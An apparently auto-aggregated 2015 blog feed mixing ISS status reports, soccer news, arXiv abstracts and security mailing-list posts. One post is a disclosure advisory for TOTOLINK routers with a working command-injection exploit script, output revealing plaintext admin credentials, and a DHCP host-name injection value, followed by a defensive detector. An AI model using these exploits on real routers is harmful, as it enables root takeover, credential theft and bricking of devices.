Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Operate
Carbon Dioxide Removal Assembly (CDRA) Node 3: Standby
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1LlRjbo
via IFTTT

Ex-Cardiff manager Mackay cleared by English FA over texts

LONDON (AP) The English Football Association will not punish former Cardiff manager Malky Mackay over a dossier of offensive text-message exchanges with a colleague.

from FOX Sports Digital http://ift.tt/1GnXvsM
via IFTTT

Malware And Hacking Forum Seized, Dozens Arrested

The FBI and other law enforcement agencies have arrested more than 70 people suspected of carrying out cyber criminal activities associated with one of the most active underground web forums known as Darkode. Darkode, also used by notorious Lizard Squad, was an online bazaar for cyber criminals looking to buy and sell hacking tools, botnet tools, zero-day exploits, ransomware programs,


from The Hacker News http://ift.tt/1DiLQvo
via IFTTT

Leverkusen signs Jonathan Tah from Hamburger SV

LEVERKUSEN, Germany (AP) Bayer Leverkusen has signed Germany under-19 captain Jonathan Tah from Bundesliga rival Hamburger SV.

from FOX Sports Digital http://ift.tt/1TEiqBk
via IFTTT

Swiss extradite detained FIFA official to the United States

BERN, Switzerland (AP) Swiss authorities say one of the seven FIFA officials arrested in Zurich as part of a U.S. corruption probe has been extradited to the United States.

from FOX Sports Digital http://ift.tt/1DiAQOp
via IFTTT

Swiss authorities say 1 of 7 detained FIFA officials has been extradited to the United States

BERN, Switzerland (AP) Swiss authorities say 1 of 7 detained FIFA officials has been extradited to the United States.

from FOX Sports Digital http://ift.tt/1V6mThT
via IFTTT

I have a new follower on Twitter


Martin Coleman
I help customers #accelerate #cloud, improve customer service, shrink #datacentre, slash #TCO. Over 20 years in #data #storage, at EMC, NetApp, Violin.
Melbourne, Australia
http://t.co/SNpXyO2ZG7
Following: 685 - Followers: 892

July 16, 2015 at 05:17AM via Twitter http://twitter.com/flashstor

[FD] Backdoor and RCE found in 8 TOTOLINK router models

Hello, Please find a text-only version below sent to security mailing-lists. The complete version on analysing the backdoor in TOTOLINK products is posted here: http://ift.tt/1K7V6rf === text-version of the advisory without technical explanations ===

Source: Gmail -> IFTTT-> Blogger

[FD] Backdoor credentials found in 4 TOTOLINK router models


Source: Gmail -> IFTTT-> Blogger

[FD] 4 TOTOLINK router models vulnerable to CSRF and XSS attacks


Source: Gmail -> IFTTT-> Blogger

[FD] 15 TOTOLINK router models vulnerable to multiple RCEs

## Advisory Information

Title: 15 TOTOLINK router models vulnerable to multiple RCEs
Advisory URL: http://ift.tt/1I3bM5z
Blog URL: http://ift.tt/1OeiK6K
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE

## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers, wifi access points and network devices. Their products are sold worldwide.

## Vulnerabilities Summary

The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request.

The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request.

There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side.

The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration:

- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net)
- TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)

The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration:

- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)

Firmwares come from totolink.net and from totolink.cn.

From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware.

Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK.

## Details - RCE with a single HTTP request

The HTTP server allows the attacker to execute some CGI files. Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root).

Exploit code:

    $ cat totolink.carnage
    #!/bin/sh
    if [ ! $1 ]; then
      echo "Usage:"
      echo $0 ip command
      exit 1
    fi
    wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh

The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://ift.tt/1HAFgHE

o Listing of the filesystem

HTML/JS exploits: http://ift.tt/1OeiK6M

Using CLI:

    root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
    ash
    auth
    busybox
    cat
    chmod
    cp
    d.cgi
    date
    echo
    false
    root@kali:~/totolink#

o How to retrieve the credentials ? (see login and password at the end of the text file)

HTML/JS exploits: http://ift.tt/1I3bM5D

Using CLI:

    kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
    wantype.wan1=dynamic
    dhblock.eth1=0
    ppp_mtu=1454
    fakedns=0
    upnp=1
    ppp_mtu=1454
    timeserver=time.windows.com,gmt22,1,480,0
    wan_ifname=eth1
    auto_dns=1
    dhcp_auto_detect=0
    wireless_ifmode+wlan0=wlan0,0
    dhcpd=0
    lan_ip=192.168.1.1
    lan_netmask=255.255.255.0
    dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
    dhcpd_dns=164.124.101.2,168.126.63.2
    dhcpd_opt=7200,30,200,
    dhcpd_configfile=/etc/udhcpd.conf
    dhcpd_lease_file=/etc/udhcpd.leases
    dhcpd_static_lease_file=/etc/udhcpd.static
    use_local_gateway=1
    login=admin
    password=admin

Login and password are stored in plaintext, which is a very bad security practice.

o Current running process:

HTML/JS exploits: http://ift.tt/1OeiK6P

Using CLI:

    kali# ./totolink.carnage 192.168.1.1 ps -auxww

o Getting the kernel memory:

HTML/JS exploits: http://ift.tt/1I3bL1i

Using CLI:

    kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore

o Default firewall rules:

HTML/JS exploits: http://ift.tt/1OeiJQl

Using CLI:

    kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL

o Opening the management interface on the WAN:

HTML/JS exploits: http://ift.tt/1I3bL1m

o Reboot the device:

HTML/JS exploits: http://ift.tt/1OeiK6T

o Brick the device:

HTML/JS exploits: http://ift.tt/1I3bL1o

An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root.

By the way, d.cgi in /bin/ is an intentional backdoor.

## Details - RCE with a single DHCP request

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

    cat /etc/dhcp/dhclient.conf
    send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the dhcp request will immediately force the reboot of the remote device:

    Booting...
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @
    @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
    @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
    @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
    @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
    @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    [...]
    WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
    Launch iwcontrol: wlan0
    Reaped 317
    iwcontrol RUN OK
    SIGNAL -> Config Update
    signal progress
    killall: pppoe-relay: no process killed
    SIGNAL -> WAN ip changed
    WAN0 IP: 192.168.2.1
    signalling START
    Invalid upnpd exit
    killall: upnpd: no process killed
    upnpd Restart 1
    iptables: Bad rule (does a matching rule exist in that chain?)
    Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
    Update Session timestamp and try it after 5 seconds again.
    ez_ipupdate callback --> time_elapsed: 0
    Run DDNS by IP change: / 192.168.2.1
    Reaped 352
    iptables: Bad rule (does a matching rule exist in that chain?)
    Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
    Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
    Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
    Reaped 363
    Led Silent Callback
    Turn ON All LED
    Dynamic Channel Search for wlan0 is OFF
    start_signal => plantynet_sync
    Do start_signal => plantynet_sync
    SIGNAL -> Config Update
    signal progress
    killall: pppoe-relay: no process killed
    SIGNAL -> WAN ip changed
    Reaped 354
    iptables: Bad rule (does a matching rule exist in that chain?)
    ez_ipupdate callback --> time_elapsed: 1
    Run DDNS by IP change: / 192.168.2.1
    Burst DDNS Registration is denied: iptime -> now:26
    Led Silent Callback
    Turn ON All LED
    /proc/sys/net/ipv4/tcp_syn_retries: cannot create

Source: Gmail -> IFTTT-> Blogger
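
A defensive check for the DHCP issue described in the advisory above, as an added example that is not part of the advisory or of any TOTOLINK code: it parses raw DHCP payloads and flags a host-name option (12) containing bytes outside a conservative allow-list. The function names, the allow-list and the sample packets are assumptions constructed for illustration.

```python
"""Flag DHCP client packets whose host-name option (12) carries shell metacharacters."""
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2131 marker that precedes the options field
BOOTP_FIXED_LEN = 236                # fixed BOOTP header (op .. file) before the cookie
OPT_PAD, OPT_HOSTNAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255

# Assumption: a conservative allow-list for client host names.
SAFE_HOSTNAME_BYTES = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._"
)


class MalformedDhcp(ValueError):
    """Raised when the payload cannot be parsed as a DHCP message."""


def parse_options(payload):
    """Return {option_code: value_bytes} from a raw BOOTP/DHCP UDP payload.

    Option overload (option 52, options stored in sname/file) is not handled.
    """
    if len(payload) < BOOTP_FIXED_LEN + 4:
        raise MalformedDhcp("payload shorter than BOOTP header plus cookie")
    if payload[BOOTP_FIXED_LEN:BOOTP_FIXED_LEN + 4] != MAGIC_COOKIE:
        raise MalformedDhcp("missing DHCP magic cookie")
    options = {}
    i = BOOTP_FIXED_LEN + 4
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:            # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(payload):
            raise MalformedDhcp("option %d has no length byte" % code)
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise MalformedDhcp("option %d is truncated" % code)
        # RFC 3396: repeated instances of one option are concatenated.
        options[code] = options.get(code, b"") + value
        i += 2 + length
    return options


def inspect_packet(payload):
    """Return a finding dict for a suspicious or malformed packet, else None."""
    try:
        options = parse_options(payload)
    except MalformedDhcp as exc:
        return {"reason": "malformed", "detail": str(exc)}
    hostname = options.get(OPT_HOSTNAME)
    if hostname is None:
        return None
    bad = sorted({chr(b) if 32 <= b < 127 else "\\x%02x" % b
                  for b in hostname if b not in SAFE_HOSTNAME_BYTES})
    if not bad:
        return None
    hlen = min(payload[2], 16)         # hardware address length, chaddr is 16 bytes
    mac = ":".join("%02x" % b for b in payload[28:28 + hlen])
    return {"reason": "unsafe-hostname",
            "hostname": hostname.decode("latin-1"),
            "bad_chars": bad,
            "client_mac": mac}


def build_sample_request(hostname, mac=b"\x02\x00\x00\x00\x00\x01"):
    """Constructed DHCPDISCOVER used as demo input (not captured traffic)."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         1, 1, len(mac), 0, 0x12345678, 0, 0,
                         b"", b"", b"", b"", mac, b"", b"")
    options = (bytes([OPT_MSG_TYPE, 1, 1, OPT_HOSTNAME, len(hostname)])
               + hostname + bytes([OPT_END]))
    return header + MAGIC_COOKIE + options


if __name__ == "__main__":
    # The second host name is the value quoted in the advisory's dhclient.conf.
    for name in (b"laptop-01", b";/sbin/reboot"):
        print(name, "->", inspect_packet(build_sample_request(name)))
```

The same allow-list test belongs in any DHCP server code path that hands the client host name to a shell or a script; a passive sensor running this check only reports the attempt.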

[FD] SAP Security Notes July 2015

[FD] Capstone disassembly engine 3.0.4 is out!

Greetings,

We are excited to announce version 3.0.4 of Capstone disassembly framework! This stable release fixes some potential security issues in the core, so existing users are strongly recommended to upgrade.

Summary of important changes in v3.0.4:

- Fixed memory corruption bugs of X86, Arm, Mips, PowerPC & XCore architectures.
- Properly handle some X86 instructions: OUT, SSE.
- Improve Python binding with more installation options.
- Improve cross compile for Android.

More details are available at http://ift.tt/1LbSrjc

(For those who do not know, Capstone is an open source multi-arch, multi-platform disassembly engine with homepage at http://ift.tt/MNrA0A)

Thanks,
Quynh

Source: Gmail -> IFTTT-> Blogger

why does it keep telling me i didnt pass an anonymous function into the each method call and i am ...

//Problem: It look gross in smaller browser widths and small devices //Solution: To hide the text links and swap them out with a more appropriate ...

from Google Alert - anonymous http://ift.tt/1MbI7b1
via IFTTT

Pluto Resolved


New Horizons has survived its close encounter with Pluto and has resumed sending back images and data. The robotic spacecraft reported back on time, with all systems working, and with the expected volume of data stored. Featured here is the highest resolution image of Pluto taken before closest approach, an image that really brings Pluto into a satisfying focus. At first glance, Pluto is reddish and has several craters. Toward the image bottom is a surprisingly featureless light-covered region that resembles an iconic heart, and mountainous terrain appears on the lower right. This image, however, is only the beginning. As more images and data pour in today, during the coming week, and over the next year, humanity's understanding of Pluto and its moons will likely become revolutionized. via NASA http://ift.tt/1MtRDn8

Wednesday, July 15, 2015

I have a new follower on Twitter


To Be Motivated...
Everyday is a second chance.


Following: 281 - Followers: 103

July 15, 2015 at 08:41PM via Twitter http://twitter.com/tobemtivated

Evidential relational clustering using medoids. (arXiv:1507.04091v1 [cs.AI])

In real clustering applications, proximity data, in which only pairwise similarities or dissimilarities are known, is more general than object data, in which each pattern is described explicitly by a list of attributes. Medoid-based clustering algorithms, which assume the prototypes of classes are objects, are of great value for partitioning relational data sets. In this paper a new prototype-based clustering method, named Evidential C-Medoids (ECMdd), which is an extension of Fuzzy C-Medoids (FCMdd) on the theoretical framework of belief functions is proposed. In ECMdd, medoids are utilized as the prototypes to represent the detected classes, including specific classes and imprecise classes. Specific classes are for the data which are distinctly far from the prototypes of other classes, while imprecise classes accept the objects that may be close to the prototypes of more than one class. This soft decision mechanism could make the clustering results more cautious and reduce the misclassification rates. Experiments in synthetic and real data sets are used to illustrate the performance of ECMdd. The results show that ECMdd could capture well the uncertainty in the internal data structure. Moreover, it is more robust to the initializations compared with FCMdd.



from cs.AI updates on arXiv.org http://ift.tt/1HvP3f6
via IFTTT

Solomonoff Induction Violates Nicod's Criterion. (arXiv:1507.04121v1 [cs.LG])

Nicod's criterion states that observing a black raven is evidence for the hypothesis H that all ravens are black. We show that Solomonoff induction does not satisfy Nicod's criterion: there are time steps in which observing black ravens decreases the belief in H. Moreover, while observing any computable infinite string compatible with H, the belief in H decreases infinitely often when using the unnormalized Solomonoff prior, but only finitely often when using the normalized Solomonoff prior. We argue that the fault is not with Solomonoff induction; instead we should reject Nicod's criterion.



from cs.AI updates on arXiv.org http://ift.tt/1RAjicy
via IFTTT

On the Computability of Solomonoff Induction and Knowledge-Seeking. (arXiv:1507.04124v1 [cs.AI])

Solomonoff induction is held as a gold standard for learning, but it is known to be incomputable. We quantify its incomputability by placing various flavors of Solomonoff's prior M in the arithmetical hierarchy. We also derive computability bounds for knowledge-seeking agents, and give a limit-computable weakly asymptotically optimal reinforcement learning agent.



from cs.AI updates on arXiv.org http://ift.tt/1HvP0zJ
via IFTTT

Revisiting AdaBoost for Cost-Sensitive Classification. Part I: Theoretical Perspective. (arXiv:1507.04125v1 [cs.CV])

Boosting algorithms have been widely used to tackle a plethora of problems. In the last few years, a lot of approaches have been proposed to provide standard AdaBoost with cost-sensitive capabilities, each with a different focus. However, for the researcher, these algorithms shape a tangled set with diffuse differences and properties, lacking a unifying analysis to jointly compare, classify, evaluate and discuss those approaches on a common basis. In this series of two papers we aim to revisit the various proposals, both from theoretical (Part I) and practical (Part II) perspectives, in order to analyze their specific properties and behavior, with the final goal of identifying the algorithm providing the best and soundest results.



from cs.AI updates on arXiv.org http://ift.tt/1RAjicr
via IFTTT

Revisiting AdaBoost for Cost-Sensitive Classification. Part II: Empirical Analysis. (arXiv:1507.04126v1 [cs.CV])

A lot of approaches, each following a different strategy, have been proposed in the literature to provide AdaBoost with cost-sensitive properties. In the first part of this series of two papers, we have presented these algorithms in a homogeneous notational framework, proposed a clustering scheme for them and performed a thorough theoretical analysis of those approaches with a fully theoretical foundation. The present paper, in order to complete our analysis, is focused on the empirical study of all the algorithms previously presented over a wide range of heterogeneous classification problems. The results of our experiments, confirming the theoretical conclusions, seem to reveal that the simplest approach, just based on cost-sensitive weight initialization, is the one showing the best and soundest results, despite having been recurrently overlooked in the literature.



from cs.AI updates on arXiv.org http://ift.tt/1HvP0zG
via IFTTT

Learning Action Models: Qualitative Approach. (arXiv:1507.04285v1 [cs.LG])

In dynamic epistemic logic, actions are described using action models. In this paper we introduce a framework for studying learnability of action models from observations. We present first results concerning propositional action models. First we check two basic learnability criteria: finite identifiability (conclusively inferring the appropriate action model in finite time) and identifiability in the limit (inconclusive convergence to the right action model). We show that deterministic actions are finitely identifiable, while non-deterministic actions require more learning power: they are identifiable in the limit. We then move on to a particular learning method, which proceeds via restriction of a space of events within a learning-specific action model. This way of learning closely resembles the well-known update method from dynamic epistemic logic. We introduce several different learning methods suited for finite identifiability of particular types of deterministic actions.



from cs.AI updates on arXiv.org http://ift.tt/1HvP3f1
via IFTTT

Massively Parallel Methods for Deep Reinforcement Learning. (arXiv:1507.04296v1 [cs.LG])

We present the first massively distributed architecture for deep reinforcement learning. This architecture uses four main components: parallel actors that generate new behaviour; parallel learners that are trained from stored experience; a distributed neural network to represent the value function or behaviour policy; and a distributed store of experience. We used our architecture to implement the Deep Q-Network algorithm (DQN). Our distributed algorithm was applied to 49 games from Atari 2600 games from the Arcade Learning Environment, using identical hyperparameters. Our performance surpassed non-distributed DQN in 41 of the 49 games and also reduced the wall-time required to achieve these results by an order of magnitude on most games.



from cs.AI updates on arXiv.org http://ift.tt/1V5aRVU
via IFTTT

Bayesian Modeling with Gaussian Processes using the GPstuff Toolbox. (arXiv:1206.5754v6 [stat.ML] UPDATED)

Gaussian processes (GP) are powerful tools for probabilistic modeling purposes. They can be used to define prior distributions over latent functions in hierarchical Bayesian models. The prior over functions is defined implicitly by the mean and covariance function, which determine the smoothness and variability of the function. The inference can then be conducted directly in the function space by evaluating or approximating the posterior process. Despite their attractive theoretical properties GPs provide practical challenges in their implementation. GPstuff is a versatile collection of computational tools for GP models compatible with Linux and Windows MATLAB and Octave. It includes, among others, various inference methods, sparse approximations and tools for model assessment. In this work, we review these tools and demonstrate the use of GPstuff in several models.



from cs.AI updates on arXiv.org http://ift.tt/MUKF9D
via IFTTT

Cuba advances with 1-0 Gold Cup win over Guatemala

CHARLOTTE, N.C. (AP) Maikel Reyes scored on a header in the 73rd minute to lift Cuba to a 1-0 win over Guatemala on Wednesday night in the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1J1pEw8
via IFTTT

Southampton signs Jordy Clasie from Feyenoord

SOUTHAMPTON, England (AP) Southampton has signed Jordy Clasie from Feyenoord, helping to fill the void left by midfielder Morgan Schneiderlin joining Manchester United.

from FOX Sports Digital http://ift.tt/1MuXWXt
via IFTTT

FIFA urged to let public figures lead change after scandals

GENEVA (AP) FIFA should let ''eminent public figures'' lead truly independent reform of the scandal-hit governing body, according to Transparency International.

from FOX Sports Digital http://ift.tt/1CI2Pft
via IFTTT

2 Cuban soccer players are no-shows at Gold Cup match in US

CHARLOTTE, N.C. (AP) The whereabouts of two Cuban national soccer team midfielders are unknown ahead of the squad's Gold Cup match vs. Guatemala.

from FOX Sports Digital http://ift.tt/1SnZJ24
via IFTTT

Rowdies of 2nd-tier NASL agree to contract with Freddy Adu

ST. PETERSBURG, Fla. (AP) The Tampa Bay Rowdies of the second-tier North American Soccer League have agreed to a contract with one-time phenom Freddy Adu.

from FOX Sports Digital http://ift.tt/1I3BJSn
via IFTTT

US soccer chief felt 'discomfort' during soccer proceedings

WASHINGTON (AP) U.S. Soccer Federation chief executive Dan Flynn said Wednesday he had no direct knowledge of bribery or kickbacks exchanged by FIFA officials but experienced moments of ''discomfort'' during meetings.

from FOX Sports Digital http://ift.tt/1OeQ6m4
via IFTTT

Anonymous gossip app Yik Yak will now let you post photos — but selfies aren't allowed

Yik Yak, the anonymous, location-based social network that has been banned in some colleges ...

from Google Alert - anonymous http://ift.tt/1f4RXxB
via IFTTT

Anonymous on Twitter: "For context on recent events in #Denver: https://t.co/YUZq73O4xT ...

Retweets 51; Favorites 29; PATRIOT CAPO's world Chris Jo(an)hn Sherry Woodbeck Anonymous Amber Willis anarchoanthro Ξnemy of the State.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/621212861763862528&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFSatgelMdigE-gfTKu2EQPgd9Xew
via IFTTT

US soccer chief felt 'discomfort' during FIFA proceedings

WASHINGTON (AP) U.S. Soccer Federation chief executive and secretary general Dan Flynn said Wednesday he had no direct knowledge of bribery or kickbacks exchanged by FIFA officials but experienced moments of ''discomfort'' during meetings.

from FOX Sports Digital http://ift.tt/1V4vx0b
via IFTTT

Barcelona, Juventus players head UEFA Best Player shortlist

NYON, Switzerland (AP) Champions League finalists Barcelona and Juventus provide eight of the 10 players shortlisted for UEFA's Best Player in Europe Award for last season.

from FOX Sports Digital http://ift.tt/1HuOoKP
via IFTTT

ISS Daily Summary Report – 07/14/15

NanoRack Cubesat Deployer (NRCSD) Operations:  Overnight there was an issue with a NRCSD deploy. Ground teams sent the command but only one door opened. Later during a night pass it was discovered that the CubeSat had deployed. Ground teams met and agreed to go forward with an additional deploy which was completed successfully. So far 8 of 16 Cubesats have been deployed. The complement consists of 14 Planet Lab Doves, 1 Arkyd-3 and 1 Centennial-1 satellite.  Integrated Resistance and Aerobic Training Study (Sprint) Portable Pulmonary Function System (PPFS):  Kelly set up the Portable PFS (Pulmonary Function System) power, data, front panel, and gas connections from a temporary stow deployed position and configured the PPFS Mixing Bag System (MBS) in preparation for the Sprint session scheduled for Wednesday.  Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in International Space Station (ISS) crewmembers during long-duration missions. Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. Radiation Dosimetry Inside ISS-Neutrons (Radi-N):  Kornienko handed Radi-N hardware to Kelly who then distributed the eight bubble detectors in the Columbus module and took closeout photos of the detectors in the deployed locations.  The objective of this investigation is to better characterize the ISS neutron environment and define the risk posed to crewmembers’ health and provide the data necessary to develop advanced protective measures for future space flight.  For each session, 8 detectors are initialized and deployed in predetermined locations for measurements: a set of 6 spectrometric detectors and two control detectors are placed on a wall of a ISS Segment. After 7 days the detectors are collected and read using the BUBBLE reader. 
Carbon Dioxide Removal Assembly (CDRA) Status: Node 3 (N3) CDRA: Today, ground controllers successfully commanded the N3 CDRA Air Selector Valve (ASV) 104 to position B.  N3 CDRA was activated and is currently operational.  Ground teams will continue to monitor ASV 104 performance and if necessary, a Removal & Replacement (R&R) will be planned later this week. Vozdukh was commanded to Mode 4 to assist with ppCO2 level management. Lab CDRA: Remote Power Controller Module (RPCM) LAD62B-A Remote Power Controller (RPC) 12, which powers the Lab CDRA valves, continues to experience overcurrent trips.  Yesterday, the RPC stayed closed for over 7 hours before it tripped. Ground controllers are reviewing the data on the most recent trips prior to attempting to reclose the RPC. An R&R of the RPCM is being considered for next week to rule out the RPCM as the source of overcurrent trips. Extravehicular Activity (EVA) Battery Stowage Assembly (BSA) Battery Maintenance:  Kelly initiated battery maintenance for Rechargeable EVA Battery Assembly (REBA), Helmet Light (HL), and Pistol Grip Tool (PGT) Batteries in the Battery Stowage Assembly (BSA) via the Battery Charger Assembly (BCA) using a discharge or an automated combination of charge and discharge cycling. This activity is in preparation for Russian EVA #41 currently scheduled for August 10. Today’s Planned Activities All activities are on schedule unless otherwise noted. 24-hour BP Monitoring (start) r/g 9337 Regeneration of БМП Ф2 Micropurification Cartridge (start) CASKAD. Manual Mixing in Bioreactor / r/g 9277 PILOT-T.  Preparation for the experiment. / r/g  9335 WRS –  Recycle Tank Fill MATRYOSHKA-R. Gathering and Initialization of Bubble-Dosimeter Detectors. / r/g 9327 PILOT-T. Experiment Ops. / r/g 9335 MATRYOSHKA-R. Handover of BUBBLE-dosimeters to USOS / r/g 9327 RADIN – Handover of detectors to USOS for deployment MATRYOSHKA-R. BUBBLE-dosimeter initialization and deployment. 
/ r/g 9327 RADIN – Deployment of detectors WRS Water Sample Analysis PILOT-T. Experiment Ops. / r/g 9336 IDENTIFIKATSIYA. Copy ИМУ-Ц micro-accelerometer data to laptop / r/g 8732 PILOT-T.  Experiment Ops. / r/g 9334 [Deferred] Start BSA Battery Maintenance Cycling Preparing for ЗУ2А Replacement (ЭА025М) in FGB r/g 9333 NANO – Installation of  Ethernet cable [Deferred] Preparing for installation of ПН28-120 voltage converter r/g 9328 PILOT-T. Closeout Ops. / r/g 9334 [Deferred] PAO crew prep / r/g 9338 TV-PAO Event with Channel One and CNN r/g 9338 Semi-annual BRI cleaning (this includes cleaning filter, power supply unit, and fan unit). r/g 9329 TOCA Data Recording CWC Relocation Verification of ИП-1 Flow Sensor Position IMS Delta File Prep PAO Event Preventive Maintenance of FS1 Laptop (Cleaning and rebooting) / r/g 9331 Testing comm between modules. / r/g 9330 VHF1 Comm Test via US Ground Sites (AFRC, WHI) from SM SPRINT – Hardware Setup CASKAD. Manual Mixing in Bioreactor / r/g 9277 Regeneration of Micropurification unit (БМП) Ф2 cartridge (end) Completed Task List Items None Ground Activities All activities are on schedule unless otherwise noted. 
NanoRacks platform HD video

Three-Day Look Ahead:
Wednesday, 07/15: Sprint ops, VEG-01 plant thinning, JEM mesh cover-return grille cleaning, SSC 20 and 23 loading prep for 43S crew
Thursday, 07/16: JEMRMS/CubeSat activities, SPHERES Slosh review, N3 CDRA leak check
Friday, 07/17: SPHERES Slosh run

QUICK ISS Status – Environmental Control Group:
Component | Status
Elektron | On
Vozdukh | Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”) | Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”) | On
Carbon Dioxide Removal Assembly (CDRA) Lab | Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3 | Operate
Major Constituent Analyzer (MCA) Lab | Shutdown
Major Constituent Analyzer (MCA) Node 3 | Operate
Oxygen Generation Assembly (OGA) | Standby
Urine Processing Assembly (UPA) | Standby
Trace Contaminant Control System (TCCS) Lab | Off
Trace Contaminant Control System (TCCS) Node 3 | Full Up

from ISS On-Orbit Status Report http://ift.tt/1Linusc
via IFTTT

Sanfrecce Hiroshima leads J-League after beating Yamaga 6-0

TOKYO (AP) Sanfrecce Hiroshima moved into first place in the J-League after thrashing Matsumoto Yamaga 6-0 on Wednesday.

from FOX Sports Digital http://ift.tt/1I2fWdX
via IFTTT

Moggi cleared of defaming ex-Inter president Facchetti

MILAN (AP) Former Juventus executive Luciano Moggi has been cleared of defaming former Inter Milan president Giacinto Facchetti in a case related to the 2006 match-fixing scandal that shook Italian football.

from FOX Sports Digital http://ift.tt/1RySKbz
via IFTTT

1 million offered by anonymous fan for stolen Wizard of Oz ruby slippers

Now, an anonymous donor from Arizona is offering a $1 million reward for information on the shoes worn in The Wizard of Oz movie. In 2005 the ...

from Google Alert - anonymous http://ift.tt/1CDwPtt
via IFTTT

How Hacking Team and FBI planned to Unmask A Tor User

The huge cache of internal files recently leaked from the controversial Italian surveillance software company Hacking Team has now revealed that the Federal Bureau of Investigation (FBI) purchased surveillance software from the company. The leaked documents contain more than 1 million internal emails, including emails from an FBI agent who wanted to unmask the identity of a user of Tor, the


from The Hacker News http://ift.tt/1V2jQXO
via IFTTT

Polish coach Henry Kasperczak takes over at Tunisia

